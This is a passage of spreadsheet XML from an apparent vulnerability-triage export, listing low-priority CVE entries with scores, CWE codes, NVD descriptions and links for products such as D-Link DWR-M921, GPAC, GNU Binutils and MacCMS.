          <t>A vulnerability was determined in D-Link DWR-M921 1.1.52. This affects the function formsysCmd of the file /boafrm/formsysCmd of the component Boa Dispatch Table. Executing a manipulation of the argument sysCmd can lead to os command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="S1442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90705</t>
        </is>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1443" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90716</t>
        </is>
      </c>
      <c r="D1443" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1443" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1443" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1443" s="5" t="inlineStr"/>
      <c r="H1443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1443" s="5" t="inlineStr"/>
      <c r="J1443" s="5" t="inlineStr"/>
      <c r="K1443" s="5" t="inlineStr"/>
      <c r="L1443" s="5" t="inlineStr"/>
      <c r="M1443" s="5" t="inlineStr"/>
      <c r="N1443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1443" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1443" s="5" t="inlineStr"/>
      <c r="Q1443" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="R1443" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in marcobambini Gravity up to 0.9.7. This impacts the function parse_number_expression of the file src/compiler/gravity_parser.c of the component Number Parser. Performing a manipulation results in out-of-bounds read. It is possible to initiate the attack remotely. The exploit is now public and may be used. Upgrading to version 0.9.8 will fix this issue. The patch is named 1b9bbf3ad5749e2a3434e6ad073c6e93c24207b6. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90716</t>
        </is>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1444" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90788</t>
        </is>
      </c>
      <c r="D1444" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1444" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1444" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1444" s="5" t="inlineStr"/>
      <c r="H1444" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I1444" s="5" t="inlineStr"/>
      <c r="J1444" s="5" t="inlineStr"/>
      <c r="K1444" s="5" t="inlineStr"/>
      <c r="L1444" s="5" t="inlineStr"/>
      <c r="M1444" s="5" t="inlineStr"/>
      <c r="N1444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1444" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1444" s="5" t="inlineStr"/>
      <c r="Q1444" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R1444" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in magicblack MacCMS10 2026.1000.4055. Affected by this vulnerability is an unknown functionality of the file /admin1.php/admin/template/index/path/.%40template%40default%40html%40label.html of the component Template Handler. Performing a manipulation results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90788</t>
        </is>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92247</t>
        </is>
      </c>
      <c r="D1445" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1445" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1445" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1445" s="5" t="inlineStr"/>
      <c r="H1445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1445" s="5" t="inlineStr"/>
      <c r="J1445" s="5" t="inlineStr"/>
      <c r="K1445" s="5" t="inlineStr"/>
      <c r="L1445" s="5" t="inlineStr"/>
      <c r="M1445" s="5" t="inlineStr"/>
      <c r="N1445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1445" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1445" s="5" t="inlineStr"/>
      <c r="Q1445" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="R1445" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in synaptikcms synaptik-cms up to 1.3.4.4. This affects the function rename of the file admin/file-manager.php of the component Admin File Manager. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 1.3.5 is able to mitigate this issue. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92247</t>
        </is>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92418</t>
        </is>
      </c>
      <c r="D1446" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1446" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1446" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1446" s="5" t="inlineStr"/>
      <c r="H1446" s="5" t="inlineStr"/>
      <c r="I1446" s="5" t="inlineStr"/>
      <c r="J1446" s="5" t="inlineStr"/>
      <c r="K1446" s="5" t="inlineStr"/>
      <c r="L1446" s="5" t="inlineStr"/>
      <c r="M1446" s="5" t="inlineStr"/>
      <c r="N1446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1446" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1446" s="5" t="inlineStr"/>
      <c r="Q1446" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1446" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in ChangeWeDer crm up to c07bd4c97141521af6475034bc58523beed51bbd. This vulnerability affects unknown code of the file src/main/resources/public/js/customerServe/customer.serve.js of the component Save Endpoint. This manipulation of the argument customerName causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92418</t>
        </is>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1447" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90573</t>
        </is>
      </c>
      <c r="D1447" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E1447" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1447" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1447" s="5" t="inlineStr"/>
      <c r="H1447" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1447" s="5" t="inlineStr"/>
      <c r="J1447" s="5" t="inlineStr"/>
      <c r="K1447" s="5" t="inlineStr"/>
      <c r="L1447" s="5" t="inlineStr"/>
      <c r="M1447" s="5" t="inlineStr"/>
      <c r="N1447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1447" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1447" s="5" t="inlineStr"/>
      <c r="Q1447" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="R1447" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in GPAC up to f1219cde. The impacted element is the function gf_sg_mfurl_del of the file scenegraph/vrml_tools.c of the component MP4Box. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit is publicly available and might be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. Upgrading to version abi-16.23 is sufficient to resolve this issue. The identifier of the patch is 49dee5cad329cfed310c1682703df7daa47df31a. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90573</t>
        </is>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1448" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90613</t>
        </is>
      </c>
      <c r="D1448" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E1448" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1448" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1448" s="5" t="inlineStr"/>
      <c r="H1448" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1448" s="5" t="inlineStr"/>
      <c r="J1448" s="5" t="inlineStr"/>
      <c r="K1448" s="5" t="inlineStr"/>
      <c r="L1448" s="5" t="inlineStr"/>
      <c r="M1448" s="5" t="inlineStr"/>
      <c r="N1448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1448" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1448" s="5" t="inlineStr"/>
      <c r="Q1448" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R1448" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in GPAC up to f1219cde. Affected by this vulnerability is the function stbl_GetSampleInfos of the file isomedia/stbl_read.c of the component MP4Box. The manipulation results in reachable assertion. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version abi-16.23 addresses this issue. The patch is identified as 49dee5cad329cfed310c1682703df7daa47df31a. It is advisable to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90613</t>
        </is>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1449" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90802</t>
        </is>
      </c>
      <c r="D1449" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E1449" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1449" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1449" s="5" t="inlineStr"/>
      <c r="H1449" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1449" s="5" t="inlineStr"/>
      <c r="J1449" s="5" t="inlineStr"/>
      <c r="K1449" s="5" t="inlineStr"/>
      <c r="L1449" s="5" t="inlineStr"/>
      <c r="M1449" s="5" t="inlineStr"/>
      <c r="N1449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1449" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1449" s="5" t="inlineStr"/>
      <c r="Q1449" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="R1449" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in GNU Binutils 2.47. Affected is the function bfd_putl64 of the file bfd/libbfd.c of the component ld. This manipulation causes null pointer dereference. The attack requires local access. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through a bug report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90802</t>
        </is>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1450" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90829</t>
        </is>
      </c>
      <c r="D1450" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E1450" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1450" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1450" s="5" t="inlineStr"/>
      <c r="H1450" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1450" s="5" t="inlineStr"/>
      <c r="J1450" s="5" t="inlineStr"/>
      <c r="K1450" s="5" t="inlineStr">
        <is>
          <t>gnu:binutils</t>
        </is>
      </c>
      <c r="L1450" s="5" t="inlineStr"/>
      <c r="M1450" s="5" t="inlineStr"/>
      <c r="N1450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1450" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1450" s="5" t="inlineStr"/>
      <c r="Q1450" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="R1450" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in GNU Binutils 2.47. This issue affects the function bfd_elf_set_group_contents of the file bfd/elf.c of the component SHT_GROUP Section Handler. Executing a manipulation can lead to null pointer dereference. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through a bug report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90829</t>
        </is>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1451" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90830</t>
        </is>
      </c>
      <c r="D1451" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E1451" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1451" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1451" s="5" t="inlineStr"/>
      <c r="H1451" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1451" s="5" t="inlineStr"/>
      <c r="J1451" s="5" t="inlineStr"/>
      <c r="K1451" s="5" t="inlineStr">
        <is>
          <t>gnu:binutils</t>
        </is>
      </c>
      <c r="L1451" s="5" t="inlineStr"/>
      <c r="M1451" s="5" t="inlineStr"/>
      <c r="N1451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1451" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1451" s="5" t="inlineStr"/>
      <c r="Q1451" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="R1451" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in GNU Binutils 2.47. Impacted is the function _bfd_write_merged_section of the file bfd/merge.c of the component Section Merge. The manipulation leads to null pointer dereference. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through a bug report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90830</t>
        </is>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1452" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90831</t>
        </is>
      </c>
      <c r="D1452" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E1452" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1452" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1452" s="5" t="inlineStr"/>
      <c r="H1452" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1452" s="5" t="inlineStr"/>
      <c r="J1452" s="5" t="inlineStr"/>
      <c r="K1452" s="5" t="inlineStr">
        <is>
          <t>gnu:binutils</t>
        </is>
      </c>
      <c r="L1452" s="5" t="inlineStr"/>
      <c r="M1452" s="5" t="inlineStr"/>
      <c r="N1452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1452" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1452" s="5" t="inlineStr"/>
      <c r="Q1452" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R1452" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in GNU Binutils 2.47. The affected element is the function _bfd_elf_strtab_delref of the file bfd/elf-strtab.c of the component ELF String Table. The manipulation results in memory corruption. The attack requires a local approach. The exploit is now public and may be used. The project was informed of the problem early through a bug report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90831</t>
        </is>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92472</t>
        </is>
      </c>
      <c r="D1453" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E1453" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1453" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1453" s="5" t="inlineStr"/>
      <c r="H1453" s="5" t="inlineStr"/>
      <c r="I1453" s="5" t="inlineStr"/>
      <c r="J1453" s="5" t="inlineStr"/>
      <c r="K1453" s="5" t="inlineStr"/>
      <c r="L1453" s="5" t="inlineStr"/>
      <c r="M1453" s="5" t="inlineStr"/>
      <c r="N1453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1453" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1453" s="5" t="inlineStr"/>
      <c r="Q1453" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-416</t>
        </is>
      </c>
      <c r="R1453" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in GPAC 26.08-DEV. The affected element is the function gf_node_deactivate_ex of the file src/scenegraph/base_scenegraph.c of the component MP4Box. Executing a manipulation can lead to use after free. The attack needs to be launched locally. The exploit has been publicly disclosed and may be utilized. Upgrading to version abi-16.24 is sufficient to fix this issue. This patch is called e34f4ba349d55cd1849f0bcf4cf46552732e2db7. The affected component should be upgraded. This issue is distinct from CVE-2026-90827.</t>
        </is>
      </c>
      <c r="S1453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92472</t>
        </is>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1454" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1454" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64059</t>
        </is>
      </c>
      <c r="D1454" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E1454" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1454" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1454" s="5" t="inlineStr"/>
      <c r="H1454" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1454" s="5" t="inlineStr"/>
      <c r="J1454" s="5" t="inlineStr"/>
      <c r="K1454" s="5" t="inlineStr"/>
      <c r="L1454" s="5" t="inlineStr"/>
      <c r="M1454" s="5" t="inlineStr"/>
      <c r="N1454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1454" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1454" s="5" t="inlineStr"/>
      <c r="Q1454" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1454" s="5" t="inlineStr">
        <is>
          <t>Grav 1.7.50.2 allows admins to enter JavaScript via the Home Page editor. NOTE: the relevance of this for stored XSS is disputed because admins are allowed to modify templates, install plugins, and upload other executable content.</t>
        </is>
      </c>
      <c r="S1454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64059</t>
        </is>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1455" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90506</t>
        </is>
      </c>
      <c r="D1455" s="5" t="n">
        <v>1.3</v>
      </c>
      <c r="E1455" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1455" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1455" s="5" t="inlineStr"/>
      <c r="H1455" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1455" s="5" t="inlineStr"/>
      <c r="J1455" s="5" t="inlineStr"/>
      <c r="K1455" s="5" t="inlineStr"/>
      <c r="L1455" s="5" t="inlineStr"/>
      <c r="M1455" s="5" t="inlineStr"/>
      <c r="N1455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1455" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1455" s="5" t="inlineStr"/>
      <c r="Q1455" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1455" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in vvbbnn00 WARP-Clash-API up to c7bf2360073959861219b422e51ae86411051b46. This impacts an unknown function of the component Save Account Job. This manipulation causes race condition. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitability is said to be difficult. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="S1455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90506</t>
        </is>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1456" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90685</t>
        </is>
      </c>
      <c r="D1456" s="5" t="n">
        <v>0.9</v>
      </c>
      <c r="E1456" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1456" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1456" s="5" t="inlineStr"/>
      <c r="H1456" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1456" s="5" t="inlineStr"/>
      <c r="J1456" s="5" t="inlineStr"/>
      <c r="K1456" s="5" t="inlineStr"/>
      <c r="L1456" s="5" t="inlineStr"/>
      <c r="M1456" s="5" t="inlineStr"/>
      <c r="N1456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1456" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1456" s="5" t="inlineStr"/>
      <c r="Q1456" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R1456" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in GPAC up to f1219cde. Affected by this issue is the function lsr_exec_command_list of the file laser/lsr_dec.c of the component MP4Box. The manipulation leads to reachable assertion. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. Upgrading to version abi-16.23 can resolve this issue. The identifier of the patch is afca1f1181668d85941d51ed1adf647807d5d975. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="S1456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90685</t>
        </is>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90826</t>
        </is>
      </c>
      <c r="D1457" s="5" t="n">
        <v>0.9</v>
      </c>
      <c r="E1457" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1457" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1457" s="5" t="inlineStr"/>
      <c r="H1457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1457" s="5" t="inlineStr"/>
      <c r="J1457" s="5" t="inlineStr"/>
      <c r="K1457" s="5" t="inlineStr"/>
      <c r="L1457" s="5" t="inlineStr"/>
      <c r="M1457" s="5" t="inlineStr"/>
      <c r="N1457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1457" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1457" s="5" t="inlineStr"/>
      <c r="Q1457" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="R1457" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in GPAC 26.07.0. Affected by this issue is the function gf_node_del of the file scenegraph/base_scenegraph.c of the component MP4Box. This manipulation causes out-of-bounds read. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. Upgrading to version abi-16.23 can resolve this issue. Patch name: afca1f1181668d85941d51ed1adf647807d5d975. It is advisable to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90826</t>
        </is>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81866</t>
        </is>
      </c>
      <c r="D1458" s="5" t="n">
        <v>0.5</v>
      </c>
      <c r="E1458" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1458" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G1458" s="5" t="inlineStr"/>
      <c r="H1458" s="5" t="inlineStr"/>
      <c r="I1458" s="5" t="inlineStr"/>
      <c r="J1458" s="5" t="inlineStr"/>
      <c r="K1458" s="5" t="inlineStr"/>
      <c r="L1458" s="5" t="inlineStr"/>
